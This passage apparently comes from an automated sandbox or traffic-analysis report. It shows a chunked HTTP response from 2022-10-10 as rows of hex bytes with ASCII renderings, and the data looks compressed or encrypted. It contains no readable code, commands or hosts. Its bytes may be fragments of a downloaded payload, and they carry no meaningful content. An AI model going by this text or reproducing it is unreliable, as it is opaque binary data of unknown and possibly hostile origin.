80 40 a2 8d 79 01 3d ac 1b f4 e5 23 b6 9b 9d 89 57 d2 e6 19 d1 31 63 93 c6 f3 37 7a d8 20 32 66 64 c2 30 26 63
                  Data Ascii: ]%6Q3-/b@/@6FJsRU{gnVz*E`p;V=y4&:N1ExLT]3~2R{6(>w\3P!65?oc3W5@q[zIo?/hW2:Yw\$l"Ef7@y=#W1c7z 2fd0&c
                  2022-10-10 21:21:48 UTC343INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC343INData Raw: 32 30 30 30 0d 0a a5 1c 34 13 72 91 96 dc cf 28 42 77 ca c9 c5 13 86 f6 2b 81 b9 f7 7d 5e 49 ef b3 f0 42 37 98 41 0c f0 2f ca 5d 63 31 b2 4d d3 33 14 68 92 76 0f cd 0c 86 6d 39 96 37 d6 be 87 f3 ac 97 fc ab 22 a0 34 ad 03 07 7d 95 48 88 1d ee 7f 8b 44 30 3e 48 ed 26 27 ab f2 4e 6e a9 83 5a e0 8f 55 76 f8 b5 4e 76 50 4c 65 5f 38 b0 b7 ec 63 b6 92 74 dc 1b e2 87 82 dd c8 0c e2 3b c1 79 26 08 63 07 13 ac 9e a7 fc 3d ec ce 83 6b 39 79 85 c6 4e 0c a8 60 89 01 51 5f 6d 71 d5 9f bf b0 13 da b1 41 2c 9b 83 d2 32 5d 1c 57 bc 71 13 7f 60 67 ce c7 90 19 d0 e3 7a 33 2f e2 6d bd 84 40 39 de 9b 51 c9 36 53 00 e7 b3 dd f8 e0 4e 95 29 35 ad 86 6a 12 7d 61 a3 9e 1d 57 eb 1e 82 83 1c 2e aa a6 cc 65 d9 86 02 96 2d a5 a0 d0 c1 b0 db 47 c1 64 b4 21 75 79 54 0b 50 c9 59 94 7a
                  Data Ascii: 20004r(Bw+}^IB7A/]c1M3hvm97"4}HD0>H&'NnZUvNvPLe_8ct;y&c=k9yN`Q_mqA,2]Wq`gz3/m@9Q6SN)5j}aW.e-Gd!uyTPYz
                  2022-10-10 21:21:48 UTC351INData Raw: c7 c3 f8 12 d9 42
                  Data Ascii: B
                  2022-10-10 21:21:48 UTC351INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC351INData Raw: 32 30 30 30 0d 0a d8 9c de 3d 37 87 d0 4b 13 a2 ad e6 bf f3 ce aa a9 ce e3 f2 d0 4a 8e 8f 62 b1 c9 37 bb 19 73 ff 1e 98 03 9d 46 f6 b4 8a 66 62 0b 1f f7 1c 67 fc e5 88 95 e5 4a ed 3d 7a 31 98 b8 e6 5e f6 69 8b b9 be 35 5a a0 21 3c c0 32 c5 29 8f aa 0a 5f 0c 38 d9 9b 9c 85 a9 08 ff 08 9e 12 d1 19 c6 43 f5 89 59 2e ab 2d b3 5a 67 5c 5c 2a ed ea 63 03 4a 4e 92 53 e9 7c 8c 73 ee ae 56 46 ad 2c d2 88 9b 1e 9c 53 ef 72 12 8e 5d 70 80 d7 68 7b 47 07 24 63 90 f3 1e 14 15 94 ef 60 8f e9 9c 2a bb e9 a2 85 44 32 61 39 41 8d c5 52 f5 ec fb 29 16 b6 0c 3a 61 62 bc 4a 5a eb af 09 f1 74 49 63 b7 65 db 01 4a f3 fb d6 5a d1 7f 71 2b 6c d7 a7 c0 bf 3b 03 a8 93 84 c9 8b 95 75 65 98 7d c1 51 45 11 46 c1 28 4e bb 26 46 d6 8e 79 d3 3a 32 a3 bb 23 69 4c 8f cb a3 ad c0 84 3f 7b
                  Data Ascii: 2000=7KJb7sFfbgJ=z1^i5Z!<2)_8CY.-Zg\\*cJNS|sVF,Sr]ph{G$c`*D2a9AR):abJZtIceJZq+l;ue}QEF(N&Fy:2#iL?{
                  2022-10-10 21:21:48 UTC359INData Raw: 9a f8 a8 2d ad 81
                  Data Ascii: -
                  2022-10-10 21:21:48 UTC359INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC359INData Raw: 32 30 30 30 0d 0a 28 b7 4c 15 19 94 b3 22 a7 c0 58 90 7f 83 0d b4 f1 0a 8f 6d 11 0c d9 34 51 ed f2 d8 50 00 03 87 b9 01 c7 5d 66 68 30 ed 83 12 cf 79 70 97 89 87 46 ac d9 3f 2a c6 55 96 d3 d4 b8 d9 85 71 31 f8 90 ad f0 18 83 9d 6f 9d 90 89 25 96 d8 96 36 c0 97 8a 99 62 29 2d 5c ad 18 5f d3 7b af 50 e1 78 79 79 a7 07 51 b4 a9 a3 d2 20 13 c5 f4 51 12 72 8f d0 e9 bd 65 79 78 3d bb e4 97 29 d6 e6 ee 6a ad 21 61 ee 5f fd 54 01 7d 8e 00 42 e2 c7 b0 df 11 97 fb a3 0d a7 0f d5 25 43 f7 d0 7f 73 a9 f0 59 e1 9b a2 4b 70 f9 d5 47 c4 70 ef 6c 79 3d d3 a3 70 04 d6 3c d8 99 83 d7 16 b4 dc 00 b3 69 d4 fe 9f 9e d8 a1 87 fd 7f 1e c2 fa bf 66 e1 f3 ba e1 56 26 51 b0 f0 5c 3b 66 b7 7a 4a 62 35 9e 6f 53 ec 33 d6 4d 70 27 8f a1 3f 3b 73 d9 d1 26 75 23 1f 1f a9 11 41 7e 67 11
                  Data Ascii: 2000(L"Xm4QP]fh0ypF?*Uq1o%6b)-\_{PxyyQ Qreyx=)j!a_T}B%CsYKpGply=p<ifV&Q\;fzJb5oS3Mp'?;s&u#A~g
                  2022-10-10 21:21:48 UTC367INData Raw: 05 97 4b 19 a7 5f
                  Data Ascii: K_
                  2022-10-10 21:21:48 UTC367INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC367INData Raw: 32 30 30 30 0d 0a c7 4f dc f0 97 f1 f3 12 9a 4f 4b a6 05 81 9c d7 4e f1 3d 27 ca 22 8d 03 c2 b1 c3 ee 69 29 bc bd bc 58 83 c1 44 a0 df 25 b7 a9 d7 64 06 01 43 89 c1 48 81 d3 a4 29 a1 8f 66 ff 97 66 fd d7 ab 48 25 0f bd 57 2d a8 dd fd c6 fb c8 52 08 cf eb 51 d1 85 4d 63 b5 9c ce 86 40 9d cf d9 17 b1 70 4a 06 f9 6b 06 4d 5a 82 75 13 76 db 96 22 81 98 94 4e c2 a6 32 c5 3b 47 d8 61 c2 15 6b 1c ab 81 7c 5f e7 ec 35 a0 99 7f 92 96 d7 c4 32 37 ed e9 9c 91 02 33 d2 b3 0c 16 a3 43 16 68 b5 69 75 d1 6f c3 a8 08 53 8c 58 78 b4 08 c9 b3 b8 78 78 45 82 d3 71 b9 08 1a 39 14 da be cb fe 83 48 15 69 f3 0d 66 9d 1d cb f2 35 ac 21 dd b6 dd 7f a6 de e5 fd b2 96 89 be 22 b4 a8 24 20 29 36 22 6a 84 01 51 db df 9d 56 33 52 cf 47 f1 cd 84 58 4f 21 1a b3 74 74 15 3e ae ae fb 32
                  Data Ascii: 2000OOKN='"i)XD%dCH)ffH%W-RQMc@pJkMZuv"N2;Gak|_5273ChiuoSXxxxEq9Hif5!"$ )6"jQV3RGXO!tt>2
                  2022-10-10 21:21:48 UTC375INData Raw: 26 56 de 3f f3 63
                  Data Ascii: &V?c
                  2022-10-10 21:21:48 UTC375INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC375INData Raw: 32 30 30 30 0d 0a e9 b3 05 38 20 8e 55 0a 17 7d 01 34 44 c7 1b a2 83 c0 59 a8 8e 9d 0c 2d 81 6d d4 bb 46 88 1b 68 08 1b 0a ff 23 6a 7a 9b 9e 45 d2 f4 ce ac 3b 0b 9a 24 0c c6 f6 3e b7 21 ec 35 1d 3a c6 5e 9a e0 9b af 20 c1 06 da 9b 1b 0b 02 f5 99 66 1c c1 44 4a 8b 61 1a 5f 6e 6a 09 85 9b ac a3 1e 35 19 8c 67 09 0b 7b e5 b5 b4 c6 ed 3a 19 98 de 0b 08 2c 6e 06 8a f4 f3 cf 5d 9c 91 c3 31 c5 4b 02 80 f6 be ba 97 98 a4 22 db da 6b 34 89 c5 70 66 a5 d6 8f 5d 59 21 4a b4 1f fc fe b5 49 c5 34 a5 5f 31 4b 18 e6 1c 34 c7 89 39 84 1f 2b ae fd 6c b7 2a 13 43 55 52 ef a2 3f d8 11 34 96 85 55 28 7b 02 e9 5c c6 db 27 01 06 62 42 87 83 ab 0c 26 4a e3 26 25 26 d4 1d 1e a2 01 1d fb 46 01 7a 70 80 4c cc 80 0c fe 52 42 62 d0 bb 2a 74 eb af c3 05 72 70 8c 5b 05 46 95 aa 02 44
                  Data Ascii: 20008 U}4DY-mFh#jzE;$>!5:^ fDJa_nj5g{:,n]1K"k4pf]Y!JI4_1K49+l*CUR?4U({\'bB&J&%&FzpLRBb*trp[FD
                  2022-10-10 21:21:48 UTC383INData Raw: e1 88 3e 82 9c dc
                  Data Ascii: >
                  2022-10-10 21:21:48 UTC383INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC383INData Raw: 32 30 30 30 0d 0a 51 12 37 c6 bc 9a 58 42 3d 8b 8b 02 2a e9 3e 8e ea 63 58 47 a1 c3 6c a3 1f 5b 08 95 fc bf f6 38 71 04 a7 4d e4 74 ab 73 5f 8e b8 77 e6 f1 e7 2f f3 6c 58 f0 5e df 3b 47 ea 0d 20 d8 aa ab c2 f8 eb 78 48 06 06 7e 42 30 d9 13 52 a4 9c a9 6c 27 3f 9c 89 39 85 de f0 00 b6 94 b4 e5 fa c9 62 01 66 3e df 46 05 4a c3 fe 84 89 75 3a 83 d9 07 80 84 00 d0 31 54 b6 09 5c 15 a0 90 8f cc fb a9 7f 1e e9 af 4c 22 bc 53 ba f8 cb aa 38 3c 14 20 15 b4 6d ca 8d 6f d8 9c cc b4 ba dd 9f dd 68 1d 7c 77 dd ee 79 6d 9f 4b 16 1c 2a be 0a 30 54 73 ee 51 26 cb cc f9 72 44 fa 14 1f ce ed 29 8e bf 80 fd f3 d7 0a 0e ae 91 2a 90 8f e1 c4 4e 69 f0 13 54 ad 5e 61 aa 95 be bf ac f0 0b 4b 37 ae 54 b4 b9 1e b5 6f 5d ba 95 62 b4 46 0a 37 0d de 44 b2 d7 2b cf 98 09 ef 16 63 8a
                  Data Ascii: 2000Q7XB=*>cXGl[8qMts_w/lX^;G xH~B0Rl'?9bf>FJu:1T\L"S8< moh|wymK*0TsQ&rD)*NiT^aK7To]bF7D+c
                  2022-10-10 21:21:48 UTC391INData Raw: d8 72 af 51 80 fb
                  Data Ascii: rQ
                  2022-10-10 21:21:48 UTC391INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC391INData Raw: 31 66 66 38 0d 0a 26 bf 3b e3 e5 09 02 dc 27 6e 2c 67 15 ab ff 0e ea ba 83 6d a7 79 8d cf c9 6a 84 c9 47 b3 01 82 60 40 b3 d9 6c fa 84 a1 c6 e0 59 51 44 10 89 09 39 3a a6 c1 3d 94 f5 05 f5 63 a4 7e e0 3a 39 bb 10 6c a3 10 b4 dd 1f 7e 4a 1b 9c 55 0d a7 c1 e3 b9 cd 3b ea cb ce 17 b8 0a 98 12 b9 7a e4 23 46 07 7e a8 de 9d 3f 72 27 3e 39 cc 25 d7 0f cb 97 ec a5 da 9f 33 91 b6 2b 78 e8 14 52 8f 51 2c 27 a9 93 1e ac 6c 91 1d b3 8c 1c ae 33 f0 1a 9e 7d a1 4c d8 04 a7 a6 0d b8 72 f9 a7 ee 86 93 96 f8 90 38 92 8b 9f 03 9b 76 ff 29 c5 70 2b d4 4e e3 1e 53 0a e9 b1 75 12 e5 c8 8a 10 40 8d a9 30 c2 c9 08 0d b5 44 12 eb fa 6d 2f fb 61 d8 6c 67 77 d7 60 dc 66 fa b5 29 39 50 b9 4d 27 d5 49 78 e5 f8 45 e4 8b 39 0c 37 ee b8 b9 e5 e5 9d 78 2f 32 d4 b3 03 07 ff e3 52 ac 48
                  Data Ascii: 1ff8&;'n,gmyjG`@lYQD9:=c~:9l~JU;z#F~?r'>9%3+xRQ,'l3}Lr8v)p+NSu@0Dm/algw`f)9PM'IxE97x/2RH
                  2022-10-10 21:21:48 UTC399INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC399INData Raw: ed 9f 0b a6 8f 88 6e 7a 58 ac 19 ff 61 a5 a1 bb cb 99 8d 61 3c 8d 06 dc 03 d2 03 72 ac c8 2e e3 da 56 5d 2a af cc 6c bf 7f b3 66 e9 09 41 2a 91 17 11 e4 8f 75 48 45 69 07 e3 c2 8e 70 01 05 37 76 dc e9 f4 7e 17 15 5d 02 a7 ed b0 8f 65 38 0d dd b5 21 de 8b b1 63 00 d6 a0 2c af 30 c4 78 f4 da 45 84 3c 6d f5 72 67 a2 06 bb ab 5c c1 d3 67 74 a4 6b 1a e9 8b 75 78 77 14 20 b5 a7 ca 2e 62 4e 5d cd eb 2e 1e 09 0e 72 c0 be e8 02 49 f8 5d 32 51 07 40 99 2b 84 b6 7a f8 31 98 3a 87 1b a0 0b 91 26 05 73 03 88 2e cf b7 9c 95 3b 9e 73 42 b7 91 03 d6 8a 49 9d c6 03 f3 98 37 34 95 93 ad 12 44 51 96 23 6a 28 75 90 f7 f1 e6 fb 19 0d d9 e5 b3 1e 8c 71 59 fa d4 f2 52 d9 e4 71 74 6b a4 47 ce 46 03 ad 24 d0 05 19 4a c8 d0 a7 a2 83 ac 1b 08 60 b7 2c e8 a5 c6 95 3f e6 fb 0b f9 78
                  Data Ascii: nzXaa<r.V]*lfA*uHEip7v~]e8!c,0xE<mrg\gtkuxw .bN].rI]2Q@+z1:&s.;sBI74DQ#j(uqYRqtkGF$J`,?x
                  2022-10-10 21:21:48 UTC407INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC407INData Raw: 32 30 30 30 0d 0a a4 76 15 78 2b 5b be 9a 94 88 7c 98 2a b5 c2 aa 3a 0e 01 63 5c 95 89 0f 39 f3 65 82 2f b5 14 bc 92 ce f3 2c 89 2d e7 92 8f e1 28 88 08 fb d5 0b 02 69 56 81 84 0c 0a 73 91 50 f7 10 1a c3 4e 85 f6 b1 17 aa f5 76 64 2f e5 c1 89 12 16 cd 98 1c 80 fd 7e 4e 89 b4 15 86 4c 67 5e 35 e6 07 72 81 b9 86 0a fd 97 2a cc f2 ea 53 91 93 78 0a 1e a9 3b d7 16 d6 c5 9d 79 83 63 ae 2e 8e 44 a1 d3 fb c9 0b 22 bc e6 8c 38 09 d1 53 ec 54 96 2b 04 df a0 6a f1 da 18 53 d0 b9 55 f8 94 f6 14 81 89 42 ba c2 43 45 c2 64 c6 72 4c af 0a 90 85 8c fc b7 0e 93 d9 53 c4 6c 85 81 05 ce 63 1f 12 88 40 ea 6b 9d 67 e0 58 5b 3f f5 68 46 93 0f 03 be 63 73 c1 6d a1 61 1a fc 89 2a 7b b6 d0 f8 8a 1c fe 61 ec ff 84 97 bf 54 37 c1 55 a1 fb 9e 6e 7f cc eb f9 a6 79 6a 55 11 e9 e1 58
                  Data Ascii: 2000vx+[|*:c\9e/,-(iVsPNvd/~NLg^5r*Sx;yc.D"8ST+jSUBCEdrLSlc@kgX[?hFcsma*{aT7UnyjUX
                  2022-10-10 21:21:48 UTC415INData Raw: f3 4a 7b 70 67 b2
                  Data Ascii: J{pg
                  2022-10-10 21:21:48 UTC415INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC415INData Raw: 32 30 30 30 0d 0a 84 6f 87 cf ae 27 be 67 12 e6 8f b0 d7 9b c0 0f 00 d2 d4 d9 48 c1 09 99 23 a9 ca 89 31 dc 77 5d 9f d4 1a f3 b5 47 0a 69 ed de bc a6 75 9c 41 a4 38 cc 02 7a d0 f6 89 fb b6 d9 ff 38 50 af 35 a5 5c 28 fd ed ab b4 c1 25 aa b0 91 55 4c 77 b2 20 f9 a5 b9 50 68 6e 51 97 c0 ca 46 66 0a 5e a4 b0 17 dd 72 fe db 92 e5 36 e9 9a c4 8f 9b 90 5c 0b b8 4e e7 89 6b fc 3a bb bf 20 ff e7 cf b1 68 f7 3a c6 61 41 04 3b 86 f6 a1 b9 5c d8 db 86 4a d6 94 fe 80 f1 23 a4 ad 81 68 9d bc 8b c4 22 69 5b 82 85 0b 10 a8 5a cc 5d 12 72 20 93 26 a2 a4 70 8b 2c e4 aa 0d 9f ae fe a4 be 03 4f ab b6 17 75 1e f6 c0 95 0d 83 ae 97 09 c0 cf d0 7c 07 d4 5f e9 bd 6e eb 51 a3 7a 8b 05 da d3 b2 93 86 63 de 38 d2 20 cd 3e 45 c4 3f 31 4f d3 90 72 52 65 c3 e3 d0 d8 a6 1a 67 11 12 3a
                  Data Ascii: 2000o'gH#1w]GiuA8z8P5\(%ULw PhnQFf^r6\Nk: h:aA;\J#h"i[Z]r &p,Ou|_nQzc8 >E?1OrReg:
                  2022-10-10 21:21:48 UTC423INData Raw: 3b 7b 05 cb b8 35
                  Data Ascii: ;{5
                  2022-10-10 21:21:48 UTC423INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC423INData Raw: 32 30 30 30 0d 0a 4e 16 7e 17 e6 fa fa a2 4f cc 6e 2a 85 40 52 04 0a 45 08 18 64 67 69 d3 dd 59 a4 29 2d 22 c8 52 e9 25 9b 60 c7 40 64 a7 9f 26 42 f4 51 ea 3d 50 df 65 57 31 39 30 d3 8f c3 34 1a 4f 6c c0 b8 eb e4 25 4e 46 94 39 63 46 c8 0b 9f 5c cc 91 c1 03 62 14 54 2f 81 c2 ae d5 58 94 62 9d 21 ff 9f 2b c7 3a d7 45 c7 f5 ef 03 3b 25 89 47 f8 44 e1 6e 4a ba 81 b9 f5 f8 c8 70 d9 96 f2 e5 8b cb a4 60 d8 0b b4 99 e7 c3 82 20 c1 4e d9 f5 7d 46 bd 91 a4 94 ad 46 84 1d 33 54 6c 09 19 77 d7 7f 34 06 ef 78 80 b5 f3 ad c3 e8 2c 54 42 4b 78 da 63 44 d7 1d e1 9c e0 b1 f0 f8 95 46 d8 34 3f 1a a4 76 f0 26 c0 78 84 b0 f4 ac 75 4a 25 ba 74 68 f8 84 53 b8 c8 e7 23 bb 5b ec 80 dc 0d 95 ad be 14 c5 84 aa 6d 34 bf fb a1 ef cb c1 9d 01 2a ab 42 a0 9c 5d 4f 00 a4 48 f9 eb 11
                  Data Ascii: 2000N~On*@REdgiY)-"R%`@d&BQ=PeW1904Ol%NF9cF\bT/Xb!+:E;%GDnJp` N}FF3Tlw4x,TBKxcDF4?v&xuJ%thS#[m4*B]OH
                  2022-10-10 21:21:48 UTC431INData Raw: d5 eb e3 fc ba c8
                  Data Ascii:
                  2022-10-10 21:21:48 UTC431INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC431INData Raw: 32 30 30 30 0d 0a e4 b3 7e 5d 30 83 72 69 86 54 01 b4 02 9d 1d 2b e0 0e 4f d4 b0 81 40 8b 66 cd 16 96 f9 de f6 f6 4e 55 44 68 21 48 e5 49 77 80 7f 14 22 59 06 ac 5e 7a 8d 23 9e bc c9 10 05 ea 94 d6 18 89 b6 1b 61 bb 90 9f ec af 94 69 35 31 87 64 da c8 0e 32 b1 e5 ee c3 53 74 ac fe f4 89 1f 18 39 a4 11 46 e6 3e 3c c8 da c2 f5 c5 de 2c 34 79 07 67 90 a2 91 34 11 cd 0f 6b d2 45 a8 71 c8 91 b0 4d 01 ce e3 3a 55 b7 00 b8 8e 1e c1 40 fc 22 5e 51 be 97 73 64 6a 60 f2 30 b8 8e f5 3c ce f8 6e c8 1b bd 80 6d 7b 47 04 8c 5d 41 e3 a8 ee 2f 98 c1 9f 49 d5 e6 ee 91 ef 5b 47 00 39 33 80 ba a9 49 2a ba e3 f1 c4 d2 3a 06 0c 81 8d aa b9 67 0c 7e a0 26 d5 1d 74 91 9a 50 77 67 37 c6 bb 28 13 c2 bb eb bb d0 cc 22 4e 0b 20 d5 a0 5d 12 3a af f2 9e e0 06 00 a3 2a 40 14 cf ba 9b
                  Data Ascii: 2000~]0riT+O@fNUDh!HIw"Y^z#ai51d2St9F><,4yg4kEqM:U@"^Qsdj`0<nm{G]A/I[G93I*:g~&tPwg7("N ]:*@
                  2022-10-10 21:21:48 UTC439INData Raw: fd 09 97 c2 a6 70
                  Data Ascii: p
                  2022-10-10 21:21:48 UTC439INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC439INData Raw: 32 30 30 30 0d 0a d0 2a 9f 8f de d9 2a ed e5 85 6c d7 4c c2 f4 90 82 d5 03 28 4f 0c b4 41 da 6b fe 1b 43 ba 56 d7 95 52 a5 4d 54 6f 3e 46 e3 8d f6 f8 bf 94 8a 8c c9 35 71 11 0e ac 4a b2 c1 b9 f1 16 06 23 ba 77 04 b5 6f 43 b6 52 15 65 13 92 53 05 79 36 69 6b c4 30 80 be 23 f0 5b b7 cf 7b 54 80 4e 9f 71 85 b8 0a db 5e 9c fd 2b 6b 5b 3d b5 e8 6b 00 70 6b 08 ed 3f 2f 13 0d 7c 42 d3 91 59 41 c9 ed 04 5d e8 23 bb 08 37 93 38 6d 12 6c e6 b8 d2 17 16 46 2f 5c aa b3 3f b8 19 fc f5 44 fd 10 89 57 da 58 b0 39 42 46 57 de 17 c9 c4 37 e8 9b 06 4b c0 6e ee 44 d4 95 5c 2b 49 fd 59 8f 7b 4e e7 f4 19 26 8a fd 34 fb 36 7c eb 18 8f a2 53 d1 43 12 94 e6 e2 ec 11 54 e0 4c b4 c0 d1 cf 01 a6 65 7a f1 ce 37 87 7e aa 10 59 ba d7 03 e1 e2 e2 cc bc ba cf f4 ea 53 0d 06 b9 04 95 96
                  Data Ascii: 2000**lL(OAkCVRMTo>F5qJ#woCReSy6ik0#[{TNq^+k[=kpk?/|BYA]#78mlF/\?DWX9BFW7KnD\+IY{N&46|SCTLez7~YS
                  2022-10-10 21:21:48 UTC447INData Raw: 8f 7f 83 86 88 39
                  Data Ascii: 9
                  2022-10-10 21:21:48 UTC447INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC447INData Raw: 32 30 30 30 0d 0a dd 52 21 39 0f 2d 38 7f 94 cd cf a0 a8 66 e2 87 8c a7 bd 32 17 68 ee 13 77 a1 11 cb 6d 78 e6 47 a9 a3 92 86 19 04 63 1c f7 ad d5 ae 49 3f 90 d2 2f aa 1e 8a 82 82 fc 5e 7d b4 89 dc e8 ca 00 d1 b5 63 22 28 9a 61 9b 31 d4 20 fe 76 64 5d ff 60 b2 45 f2 b7 fa 40 27 fe c3 d1 6b da 1f 2c 5f 67 16 2b c8 24 f7 6e 12 1e 14 b6 ce 5a 19 3d df 03 64 b0 df fd e7 98 5a 6d 50 76 45 f5 17 e9 fd c6 f5 71 a4 3a de 19 13 c2 ff f1 1b 95 34 fd 29 32 00 9f 6d f2 b9 b5 3b c8 8c 4d 35 cd 65 87 3c 3e 35 0a ce 60 79 b7 31 c9 b6 68 a0 cd 68 7b a2 b7 e9 35 26 0a 7b 60 f3 9a f1 45 6e 4f 09 cd c5 06 bd 93 a7 7c fa da f2 d8 47 0d d4 e2 78 bb 4b db ec 50 e1 15 a0 da f3 82 f5 d6 8c 92 97 4f 7c e8 5a f4 a9 97 8d 29 33 15 92 aa 2c da 95 f3 33 ac 92 8f c3 c6 49 b3 63 87 55
                  Data Ascii: 2000R!9-8f2hwmxGcI?/^}c"(a1 vd]`E@'k,_g+$nZ=dZmPvEq:4)2m;M5e<>5`y1hh{5&{`EnO|GxKPO|Z)3,3IcU
                  2022-10-10 21:21:48 UTC455INData Raw: a8 11 c9 ea c8 bb
                  Data Ascii:
                  2022-10-10 21:21:48 UTC455INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC455INData Raw: 31 66 66 38 0d 0a 5f 55 24 88 6c 62 9c 4f 9c 94 dc 83 e2 73 ae bd f5 8e db 34 34 ab b0 17 d9 b2 ef 27 79 37 ae 58 c7 83 e4 b6 19 bc a4 d7 d9 08 07 1d 84 e6 5d c6 af 05 28 df 70 7e 3e 37 87 c5 a7 75 20 c8 ca 78 61 d1 76 6b 80 2d 2b d1 91 44 00 32 96 cf 79 08 27 5f 08 e2 51 26 74 44 92 34 78 da 49 64 64 65 37 34 7a b0 91 36 59 a3 6c 57 39 ad 93 20 bb 3e fc 7c 1b 38 00 35 f7 c6 dd d2 8c a6 9c 2a bd bf a3 8a b1 c7 cf 77 c9 51 af c7 2b 6d 0c ae 51 75 19 51 83 46 4c 80 bc 99 6a c7 e5 a1 ac 99 bc fc 58 91 b4 57 8c 80 00 44 2c 51 8b 8d 77 cb 21 ad 11 6f 15 56 2b 60 4b 3a 1c 9c 2c 19 cd 6c 7a 5c a8 af e9 9e 7e 21 46 fb 8a d7 00 1a 39 df d6 66 fc b6 e8 81 79 1b b0 ea b7 0d af 7a f1 18 7c b8 a0 97 39 18 6b 93 a2 48 28 de 18 d2 44 48 92 8f 25 5f d1 9e 95 8b a3 82 e8
                  Data Ascii: 1ff8_U$lbOs44'y7X](p~>7u xavk-+D2y'_Q&tD4xIdde74z6YlW9 >|85*wQ+mQuQFLjXWD,Qw!oV+`K:,lz\~!F9fyz|9kH(DH%_
                  2022-10-10 21:21:48 UTC463INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC463INData Raw: 6a cd ca 4b c2 b6 f1 4c 3a dd 80 10 08 da e4 d1 2e db ce 39 63 34 0f 46 3c 45 8a d2 ad 20 09 59 16 18 d6 02 db f5 5d 5a 3f a2 94 c7 88 62 c6 eb 0f 03 f3 7e 83 1b d6 9e 89 db 6e c6 4c 9f d4 7a 4f c0 a5 c9 ba 53 be c0 5a 98 52 64 88 cb 38 38 28 b9 ae e1 2b fc 1f 39 50 8c 30 60 f3 78 54 6a 79 18 ce 2b 3d 0c e3 f1 13 d1 24 63 a6 36 e4 38 ff 67 42 c9 24 38 ea fc 53 40 2e a0 5d 89 61 99 29 74 01 59 45 2c 85 bd 59 a9 e5 86 4d 3e 95 f1 c3 01 1b 84 5d 8b 6e 7c 77 73 0e 10 af a1 28 5d 1c db 18 76 f6 f3 1d 00 44 f4 d7 c9 5b 4a 21 54 47 2c ba 70 eb b5 63 d4 47 6d c0 9d 3b 7e 83 15 f3 d9 52 aa a9 b4 19 d9 03 e4 15 4a 5a 77 a2 2e 0e 3d fc c0 7f e6 fd 14 f1 91 fe b8 f2 05 5b ea c9 16 33 f1 be fa 61 4c be 77 31 d1 99 56 85 8c 85 5c 5a 47 18 c6 a8 d0 f0 5a b2 7c 33 a3 e7
                  Data Ascii: jKL:.9c4F<E Y]Z?b~nLzOSZRd88(+9P0`xTjy+=$c68gB$8S@.]a)tYE,YM>]n|ws(]vD[J!TG,pcGm;~RJZw.=[3aLw1V\ZGZ|3
                  2022-10-10 21:21:48 UTC471INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC471INData Raw: 32 30 30 30 0d 0a be 20 43 ee ba f8 a5 6d 63 83 94 fc 97 b5 15 ba 5b d4 0a 80 f5 e7 c7 9e 7d 3c bd 4c 11 9d 2d db 24 a2 47 ef ec f1 57 2b 79 1d 87 00 13 64 72 94 fc aa 95 da bd c0 3a cd 24 1e af cb 2b cc 3c 3f e0 e0 e8 e9 1b f8 ec 79 b5 bc 35 18 78 c1 d0 9c 6b e5 49 96 d1 1b 78 f1 ad 15 4b da 27 82 3a 11 64 ad a8 88 cc 56 19 87 40 b1 1d 63 a6 fe a4 e0 10 80 d2 c4 be 75 26 be 65 ed 7c 9a a0 a7 07 36 75 02 66 ff 46 83 95 41 51 eb da f8 b7 74 30 4f bb da c8 92 17 25 2f d0 b2 e5 96 65 5b 47 25 d0 0e ce 9d 1e a1 fd 66 30 cd b6 72 73 9f a4 fb 5d a6 0e da dd e6 d1 68 69 90 1e 7f 7b 72 fd 48 cf 63 01 d8 42 c0 75 ab 3c 18 64 b4 92 34 c0 35 75 62 41 73 d2 b3 f6 25 b9 fb fb 98 68 0d a3 0f ba fb 58 47 13 7d 0a 98 c0 99 69 8e f2 12 4a 81 27 0d 79 bb d3 cc 08 e5 b5 0a
                  Data Ascii: 2000 Cmc[}<L-$GW+ydr:$+<?y5xkIxK':dV@cu&e|6ufFAQt0O%/e[G%f0rs]hi{rHcBu<d45ubAs%hXG}iJ'y
                  2022-10-10 21:21:48 UTC479INData Raw: 90 f7 9d 5d 54 ec
                  Data Ascii: ]T
                  2022-10-10 21:21:48 UTC479INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC479INData Raw: 32 30 30 30 0d 0a 41 a9 90 d9 f5 7d 60 d0 d3 24 b5 b2 05 4a 19 ae 09 43 a5 27 43 3a 26 62 d7 81 41 bb 9c 76 53 03 fe 80 2f d1 0a d0 74 25 69 14 b0 4e c8 47 dc 8d 46 d5 31 e6 80 18 b9 b8 ea b9 03 d6 e1 48 fd a0 f2 22 49 9f d6 8d 04 68 6b 3a f3 f4 e0 66 9e cd ea ce c9 3f b9 9a 7a 4f 22 48 fe 79 cc 0b 6c a7 2b 82 76 18 3c 04 07 4e 54 1c c8 c4 8d e6 ec 4b 9a 67 62 e1 3a 5c 83 70 ca c3 e2 b6 50 a3 c1 ce 1a 48 db 43 27 ca 12 92 95 f4 28 b3 b9 8a 35 f5 e4 87 32 e9 30 62 24 13 f9 ee 2e 02 92 62 33 3e ea c8 4a b1 ea 8b 40 35 f7 97 a2 bf 6f 1f 61 4f 9f 56 65 87 b0 90 ec a8 9f 17 f6 87 f1 98 f3 90 61 88 aa 77 81 4b f4 7e 90 bb 89 a6 6c 06 71 21 27 f0 eb 6a 9a 0a 28 af ef b0 31 65 56 e2 28 bd 29 65 66 aa b4 3c 4b e4 a1 51 fa 3a 1d 64 f9 90 